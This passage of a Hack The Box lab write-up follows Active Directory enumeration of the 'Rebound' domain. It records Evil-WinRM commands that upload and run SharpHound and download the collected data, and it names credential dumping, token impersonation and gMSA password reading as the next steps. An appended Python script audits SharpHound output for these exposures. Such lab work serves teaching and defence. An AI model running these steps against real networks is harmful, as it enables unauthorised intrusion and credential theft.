BloodHound
I will run BloodHound again to get a better overview of the domain, since the initial attempt earlier with the python-bloodhound ingestor was not as precise as I anticipated. This time, I will be using SharpHound locally from the existing session.
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> upload ./SharpHound.ps1 C:\Users\winrm_svc\Documents
Info: Uploading /home/kali/archive/htb/labs/rebound/SharpHound.ps1 to C:\Users\winrm_svc\Documents
Data: 1744464 bytes of 1744464 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> upload ./SharpHound.exe C:\Users\winrm_svc\Documents
Info: Uploading /home/kali/archive/htb/labs/rebound/SharpHound.exe to C:\Users\winrm_svc\Documents
Data: 1402196 bytes of 1402196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> . .\SharpHound.ps1
Delivery Complete
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> Invoke-BloodHound -CollectionMethods All
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> download rebound.htb_20230912052744_BloodHound.zip rebound.htb_20230912052744_BloodHound.zip
Info: Downloading C:\Users\winrm_svc\Documents\rebound.htb_20230912052744_BloodHound.zip to rebound.htb_20230912052744_BloodHound.zip
Info: Download successful
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> .\SharpHound.exe -c All
2023-09-12T08:21:32.4392009-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-09-12T08:21:32.6267183-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-12T08:21:32.6423462-07:00|INFORMATION|Initializing SharpHound at 8:21 AM on 9/12/2023
2023-09-12T08:21:33.1423302-07:00|INFORMATION|Loaded cache with stats: 63 ID to type mappings.
63 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-12T08:21:33.1579523-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-12T08:21:33.3299150-07:00|INFORMATION|Beginning LDAP search for rebound.htb
2023-09-12T08:21:33.3768090-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-12T08:21:33.3928067-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-12T08:22:03.7206887-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2023-09-12T08:22:15.4860825-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-09-12T08:22:15.5329585-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-09-12T08:22:15.6110913-07:00|INFORMATION|Status: 104 objects finished (+104 2.476191)/s -- Using 41 MB RAM
2023-09-12T08:22:15.6110913-07:00|INFORMATION|Enumeration finished in 00:00:42.2925788
2023-09-12T08:22:15.6892232-07:00|INFORMATION|Saving cache with stats: 63 ID to type mappings.
63 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-12T08:22:15.6892232-07:00|INFORMATION|SharpHound Enumeration Completed at 8:22 AM on 9/12/2023! Happy Graphing!
Executing SharpHound
Unlike earlier, I get the precise result this time. It now shows the Service Users OU as well as the ACEs.
batch_runner
One thing that I have not been paying attention to was the presence of the batch_runner account, which is part of the Service Users OU.
Active Session
Apparently, the tbrady user has an active session to the DC host. Looking further into the HasSession edge, it might be possible to steal the authentication hash of the tbrady user via credential dumping or token impersonation.
Solution found. Moving on to the Rebound phase
ReadGMSAPassword
The tbrady user has ReadGMSAPassword access to the delegator$ account. This was initially found by adPEAS earlier, and it appears to be the next target route after compromising the tbrady user.
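The two BloodHound findings above (a ReadGMSAPassword ACE and a HasSession edge on the DC) can be pulled straight out of the SharpHound JSON without opening the graph UI, which is how a defender would audit a collection for exactly these exposures. The following is an added example, not part of the original write-up or of SharpHound/BloodHound itself: it uses constructed user and computer records shaped like SharpHound's v4 JSON output (the field names PrincipalSID, RightName, Sessions.Results, UserSID and ComputerSID are assumed from that schema), with placeholder SIDs and a hypothetical DC01 and WS01 host, and reports every principal that can read a gMSA password, every user session found, hosts where session collection failed, and any gMSA reader that is also logged on somewhere.

```python
"""Audit a SharpHound v4 JSON collection for gMSA readers and user sessions."""
import json
from collections import defaultdict

# Constructed sample data (not from the box) in the shape of SharpHound v4
# users.json / computers.json. SIDs and host names are placeholders.
USERS_JSON = json.dumps({
    "data": [
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1105",
         "Properties": {"name": "TBRADY@REBOUND.HTB", "domain": "REBOUND.HTB"},
         "Aces": []},
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1112",
         "Properties": {"name": "DELEGATOR$@REBOUND.HTB", "domain": "REBOUND.HTB"},
         "Aces": [
             {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group",
              "RightName": "GenericAll", "IsInherited": False},
             {"PrincipalSID": "S-1-5-21-1-2-3-1105", "PrincipalType": "User",
              "RightName": "ReadGMSAPassword", "IsInherited": False}]},
    ],
    "meta": {"type": "users", "count": 2, "version": 5},
})
COMPUTERS_JSON = json.dumps({
    "data": [
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1000",
         "Properties": {"name": "DC01.REBOUND.HTB", "domain": "REBOUND.HTB"},
         "Sessions": {"Collected": True, "FailureReason": None,
                      "Results": [{"UserSID": "S-1-5-21-1-2-3-1105",
                                   "ComputerSID": "S-1-5-21-1-2-3-1000"}]}},
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1001",
         "Properties": {"name": "WS01.REBOUND.HTB", "domain": "REBOUND.HTB"},
         "Sessions": {"Collected": False, "FailureReason": "Access denied",
                      "Results": []}},
    ],
    "meta": {"type": "computers", "count": 2, "version": 5},
})


def name_index(*collections):
    """Map every ObjectIdentifier (SID) to its display name."""
    names = {}
    for coll in collections:
        for obj in coll["data"]:
            names[obj["ObjectIdentifier"]] = obj["Properties"]["name"]
    return names


def gmsa_readers(users, names):
    """Sorted (reader, gMSA) pairs, one per ReadGMSAPassword ACE on a user object."""
    found = []
    for obj in users["data"]:
        for ace in obj.get("Aces", []):
            if ace.get("RightName") == "ReadGMSAPassword":
                reader = names.get(ace["PrincipalSID"], ace["PrincipalSID"])
                found.append((reader, obj["Properties"]["name"]))
    return sorted(found)


def sessions_by_user(computers, names):
    """{user: [hosts]} from collected session results, plus the hosts where
    collection failed, so a gap shows up instead of looking like 'no sessions'."""
    sessions = defaultdict(set)
    uncollected = []
    for host in computers["data"]:
        block = host.get("Sessions", {})
        if not block.get("Collected"):
            uncollected.append((host["Properties"]["name"], block.get("FailureReason")))
            continue
        for s in block.get("Results", []):
            user = names.get(s["UserSID"], s["UserSID"])
            sessions[user].add(names.get(s["ComputerSID"], s["ComputerSID"]))
    return {u: sorted(h) for u, h in sessions.items()}, uncollected


def audit(users_json, computers_json):
    """Combine both views: a gMSA reader with a live session is the first fix."""
    users, computers = json.loads(users_json), json.loads(computers_json)
    names = name_index(users, computers)
    readers = gmsa_readers(users, names)
    sessions, uncollected = sessions_by_user(computers, names)
    exposed = [(r, g, sessions[r]) for r, g in readers if r in sessions]
    return {"gmsa_readers": readers, "sessions": sessions,
            "uncollected_hosts": uncollected, "exposed_readers": exposed}


if __name__ == "__main__":
    report = audit(USERS_JSON, COMPUTERS_JSON)
    for reader, gmsa in report["gmsa_readers"]:
        print(f"ReadGMSAPassword: {reader} -> {gmsa}")
    for user, hosts in report["sessions"].items():
        print(f"HasSession: {user} on {', '.join(hosts)}")
    for host, why in report["uncollected_hosts"]:
        print(f"sessions not collected on {host}: {why}")
    for reader, gmsa, hosts in report["exposed_readers"]:
        print(f"PRIORITY: {reader} can read {gmsa} and is logged on to {', '.join(hosts)}")
```

Run it against the users.json and computers.json extracted from a real SharpHound zip by reading those files into the two string arguments of audit(). The uncollected_hosts list matters as much as the findings: a host whose session collection failed is not a host with no sessions, which is the same distinction the write-up ran into between the first and second collection.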